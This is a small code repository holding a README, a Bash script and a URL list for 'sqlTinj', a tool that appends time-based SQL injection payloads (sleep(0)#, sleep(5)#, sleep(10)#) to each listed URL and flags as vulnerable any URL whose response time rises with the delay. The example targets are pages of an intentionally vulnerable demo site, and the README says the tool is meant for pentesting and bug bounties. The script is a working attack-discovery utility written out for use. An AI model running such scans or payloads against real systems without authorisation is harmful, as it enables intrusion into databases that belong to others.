├── README.md ├── sqlTinj.sh └── urls.txt /README.md: -------------------------------------------------------------------------------- 1 | # sqlTinj 2 | Automation: Bash script wrapper to find and verify time base sql injection 3 | 4 | ## Getting started 5 | Usage: 6 | 7 | Syntax: 8 | 9 | sqlTinj -l "urllist" -z "zerosecdelay" -f "fivesecdelay" -t "tensecdelay" -a "useragent" 10 | 11 | 12 | ![image](https://user-images.githubusercontent.com/76627210/185179723-79c30e30-8742-4383-8efb-21a0da17a56d.png) 13 | 14 | 15 | options: 16 | 17 | l List of urls file. 18 | 19 | z Time based sql injection payload with zero sec delay. 20 | 21 | f Time based sql injection payload with five sec delay. 22 | 23 | t Time based sql injection payload with ten sec delay. 24 | 25 | a Customer User Agent. 26 | 27 | h For HELP 28 | 29 | Example: 30 | 31 | sqlTinj -l urls.txt -z "sleep(0)#" -f "sleep(5)#" -t "sleep(10)#" -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0" 32 | 33 | OR 34 | 35 | ./sqlTinj.sh -l urls.txt -z "sleep(0)#" -f "sleep(5)#" -t "sleep(10)#" -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0" 36 | 37 | ![image](https://user-images.githubusercontent.com/76627210/185210177-67001d9c-1df0-408f-a145-5b6a9af8e191.png) 38 | 39 | 40 | Note: This only for educational suppose and for Pentester and bugbounty hunting 41 | -------------------------------------------------------------------------------- /sqlTinj.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | usage () { 4 | echo -n $'\E[31m' 5 | echo $'' 6 | echo $' _,.' 7 | echo $' ,` -.)' 8 | echo $' \'( _/\'-\\\\-.' 9 | echo $' /,|`--._,-^| ,' 10 | echo $' \\_| |`-._/|| ,\'|' 11 | echo $' | `-, / | / / ' 12 | echo $' | || | / /' 13 | echo $' `r-._||/ __ / /' 14 | echo $' __,-<_ )`-/ `./ /' 15 | echo $'\' \\ `---\' \\ / / 16 | ▒█░▄▀ ▀█▀ ▒█░░░ ▒█░░░ ▒█▀▄▀█ ▒█▀▀▀█ ▒█▄░▒█ ▒█▀▀█ ░█▀▀█ ▒█▀▀█ ▄█░ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ 17 | ▒█▀▄░ ▒█░ ▒█░░░ ▒█░░░ ▒█▒█▒█ ▒█░░▒█ ▒█▒█▒█ ▒█░▄▄ ▒█▄▄█ ▒█▄▄▀ ░█░ ▀▄▄█ ▀▄▄█ █▄▄░ 18 | ▒█░▒█ ▄█▄ ▒█▄▄█ ▒█▄▄█ ▒█░░▒█ ▒█▄▄▄█ ▒█░░▀█ ▒█▄▄█ ▒█░▒█ ▒█░▒█ ▄█▄ ░▄▄▀ ░▄▄▀ ▀▄▄▀' 19 | echo $' | |./ /' 20 | echo $' / // /' 21 | echo $'\\_/\' \\ |/ /' 22 | echo $' | | _,^-\'/ /' 23 | echo $' | , `` (\\/ /_' 24 | echo $' \\,.->._ \\X-=/^' 25 | echo $' ( / `-._//^`' 26 | echo $' `Y-.____(__}' 27 | echo $' | {__)' 28 | echo $' ()`' 29 | echo -e "\e[32m+--------------------------------------+" 30 | echo -e "\e[32m| Code By: Santosh Kumar Sha |" 31 | echo -e "\e[32m| github: @Killmongar1996 |" 32 | echo -e "\e[32m+--------------------------------------+" 33 | echo -e "\e[31mBash script wrapper to find and verify time base sql injection" 34 | echo 35 | echo -e "\e[32m Syntax $BASH_SOURCE -l -z -f -t -a " 36 | echo 37 | echo -e "\e[31moptions:" 38 | echo -e "\e[33m l List of urls file" 39 | echo -e "\e[33m z Time based sql injection payload with zero sec delay." 40 | echo -e "\e[33m f Time based sql injection payload with five sec delay." 41 | echo -e "\e[33m t Time based sql injection payload with ten sec delay." 42 | echo -e "\e[33m a Customer User Agent ." 43 | echo -e "\e[33m h For HELP" 44 | echo "" 45 | echo -e "\e[33m Note: This only for educational suppose and for Pentester and bugbounty hunting" 46 | } 47 | 48 | while getopts l:z:f:t:a:h flag 49 | do 50 | case "${flag}" in 51 | l) urllist=${OPTARG};; 52 | z) zerosecdelay=${OPTARG};; 53 | f) fivesecdelay=${OPTARG};; 54 | t) tensecdelay=${OPTARG};; 55 | a) useragent=${OPTARG};; 56 | h) echo ""; usage; exit;; 57 | esac 58 | done 59 | 60 | 61 | while IFS= read -r line 62 | do 63 | # take action on $line # 64 | name1=$(curl -o /dev/null -s -w 'Total: %{time_total}s\n' "$line${zerosecdelay}" -H "User-Agent: ${useragent}" | sed "s/Total: //" | sed "s/s//" ) 65 | name2=$(curl -o /dev/null -s -w 'Total: %{time_total}s\n' "$line${fivesecdelay}" -H "User-Agent: ${useragent}" | sed "s/Total: //" | sed "s/s//" ) 66 | name3=$(curl -o /dev/null -s -w 'Total: %{time_total}s\n' "$line${tensecdelay}" -H "User-Agent: ${useragent}" | sed "s/Total: //" | sed "s/s//" ) 67 | 68 | payload1=$(echo $name1 |sed "s/[.].*$//") 69 | payload2=$(echo $name2 |sed "s/[.].*$//") 70 | payload3=$(echo $name3 |sed "s/[.].*$//") 71 | 72 | if [ $payload2 -gt $payload1 ] 73 | then 74 | if [ $payload3 -gt $payload2 ] 75 | then 76 | echo "$(tput setaf 1) ${line}${tensecdelay} $(tput setaf 4) is $(tput setaf 3) vulnerable to time base sql injection using payload" 77 | fi 78 | fi 79 | done <<< $(cat $urllist) 80 | 81 | if ((OPTIND == 1)) 82 | then 83 | echo "No options specified" 84 | usage 85 | exit 86 | fi -------------------------------------------------------------------------------- /urls.txt: -------------------------------------------------------------------------------- 1 | http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id= 2 | http://testphp.vulnweb.com/artist.php?artist= 3 | http://testphp.vulnweb.com/artists.php?artist= 4 | http://testphp.vulnweb.com/listproducts.php?cat= 5 | http://testphp.vulnweb.com/hpp/params.php?p= 6 | http://testphp.vulnweb.com/listproducts.php?artist= 7 | http://testphp.vulnweb.com/listproducts.php?cat= 8 | http://testphp.vulnweb.com/listproducts.php?id= 9 | http://testphp.vulnweb.com/redir.php?r= 10 | http://testphp.vulnweb.com/showimage.php?file= 11 | http://testphp.vulnweb.com:80/AJAX/infocateg.php?id= 12 | http://testphp.vulnweb.com:80/admin/?C= 13 | http://testphp.vulnweb.com:80/artists.php?artist+= 14 | http://testphp.vulnweb.com:80/bxss/vuln.php?id= 15 | http://testphp.vulnweb.com:80/comment.php?aid= 16 | http://testphp.vulnweb.com:80/comment.php?pid= 17 | http://testphp.vulnweb.com:80/hpp/?pp= 18 | http://testphp.vulnweb.com:80/hpp/index.php?pp= 19 | http://testphp.vulnweb.com:80/product.php?pic= 20 | http://testphp.vulnweb.com:80/search.php?test= 21 | http://testphp.vulnweb.com:80/secured/phpinfo.php?test= 22 | --------------------------------------------------------------------------------